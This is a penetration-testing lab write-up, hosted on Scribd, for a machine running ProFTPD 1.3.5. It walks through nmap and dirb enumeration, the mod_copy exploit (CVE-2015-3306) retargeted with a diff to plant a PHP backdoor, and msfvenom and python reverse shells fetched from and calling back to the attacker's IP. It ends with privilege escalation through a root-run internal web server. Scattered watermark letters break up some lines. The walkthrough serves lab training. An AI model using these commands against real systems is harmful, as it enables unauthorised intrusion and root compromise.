Scribd Logo
Upload

Welcome to Scribd!

  • 110_ProFTPD

    Uploaded by

    yeyintthu.mst
    2 views5 pages

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    2 views5 pages

    110_ProFTPD

    Uploaded by

    yeyintthu.mst

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 5

    r

    i to
    . 110 ProFTPD

    Ed
    Nmap
    22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

    | ssh-hostkey:

    DF
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    3825/tcp open ftp ProFTPD 1.3.5

    8098/tcp open http Apache httpd 2.4.38 ((Debian))

    rP
    |_http-title: Apache2 Debian Default Page: It works

    |_http-server-header: Apache/2.4.38 (Debian)


    te
    Service Info: OS: Unix

    /level
    as
    /server-status

    ^:8098 directories
    M

    ………………………………………………….

    Discovery of /level/
    in

    Explore paths hidden by dirb.

    dirb http://192.168.142.110:8098/
    ed

    --> Testing: http://192.168.142.110:8098/level

    ==> DIRECTORY: http://192.168.142.110:8098/level/


    at
    re
    r
    i to
    Ed
    DF
    Strange, but it was an unavailable page.
    rP
    te
    ProFTPD 1.3.5 Exploits
    as
    Search for ProFTPD 1.3.5 exploit to get the PoC for RCE, but it does not work well.
    ProFTPd 1.3.5 - ‘mod_copy’ Remote Command Execution
    https://www.exploit-db.com/exploits/36803
    ProFTPd 1.3.5 - ‘mod_copy’ Remote Command Execution (2)
    M

    https://www.exploit-db.com/exploits/49908
    You will find something even better when you look for it, but it won’t work.
    ProFTPd 1.3.5 - (mod_copy) Remote Command Execution
    https://github.com/t0kx/exploit-CVE-2015-3306
    in

    It seems that /var/www/html is not allowed to write.


    Here you recall the curious /level/ from earlier.

    Edit PoC
    ed

    Edit the PoC to target /var/www/html/level.

    diff exploit.py exploit_new.py


    33c33
    < print("[+] Target exploited, acessing shell at http://" +
    at

    self.__host + "/backdoor.php")
    ---
    > print("[+] Target exploited, acessing shell at http://" +
    self.__host + ":8098/level/backdoor.php")
    re

    40c40
    r
    i to
    < data = requests.get("http://" + self.__host +
    "/backdoor.php?cmd=whoami")
    ---
    > data = requests.get("http://" + self.__host +
    ":8098/level/backdoor.php?cmd=whoami")

    Ed
    Drop php reverse shell

    DF
    The web shell is very inconvenient.
    Drop and place the php reverse shell from the attack machine.

    msfvenom -p php/reverse_php LHOST=192.168.49.142 LPORT=4444 -f raw >

    rP
    shell.php
    python -m SimpleHTTPServer 5555

    On the victim machine, wget from a web shell.


    http://192.168.142.110:8098/level/backdoor.php?cmd=wget%20192.168.49.142:5555
    te
    /shell.php

    The php reverse shell has been dropped.


    as
    http://192.168.142.110:8098/level/shell.php

    Accessing php will give you a reverse shell.


    Receive a reverse shell with nc.
    M

    nc -nvlp 4444

    And you can get local.txt.


    in

    Discover the internal site


    ed

    After a successful intrusion, reconnect to port 6666. This is because the root shell may use port
    4444 next.
    at

    export RHOST="192.168.49.142";export RPORT=6666;python3 -c 'import


    socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("
    RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
    nc -nvlp 6666
    re
    r
    i to
    Use linpeas.sh when you have finished connecting.
    You can see that lighttpd is running as root.

    Ed
    DF
    In addition, there seems to be an internal site on ports 5000 and 3306.

    rP
    te
    as
    Copy php reverse shell

    Now that we know the internal site is running as root, can we install a php reverse shell here?
    Luckily You noticed /var/www2/ before looking at the configuration file.
    M
    in
    ed
    at
    re
    r
    i to
    Inside you will find /files and /files/robots.txt, use curl to see if they match.

    curl http://127.0.0.1:5000
    <?xml version="1.0" encoding="iso-8859-1"?>

    Ed
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
    <head>
    <title>403 Forbidden</title>
    </head>
    <body>
    <h1>403 Forbidden</h1>

    DF
    </body>
    </html>
    curl http://127.0.0.1:5000/files/robots.txt
    User-agent: *
    Disallow: /config.php
    Disallow: /administration/
    Disallow: /includes/

    rP
    Disallow: /locale/
    Disallow: /themes/
    Disallow: /print.php

    There seems to be no mistake here.


    This is where we will copy reverse shell.
    te
    cp /var/www/html/level/shell.php /var/www2/html/files/shell.php
    as

    Privilege Escalation

    The php reverse shell has been copied.


    M

    curl http://127.0.0.1:5000/files/shell.php

    Accessed from the inside, you will receive a reverse “root” shell with nc.
    in

    nc -nvlp 4444

    And you can get proof.txt.


    ed
    at
    re

    You might also like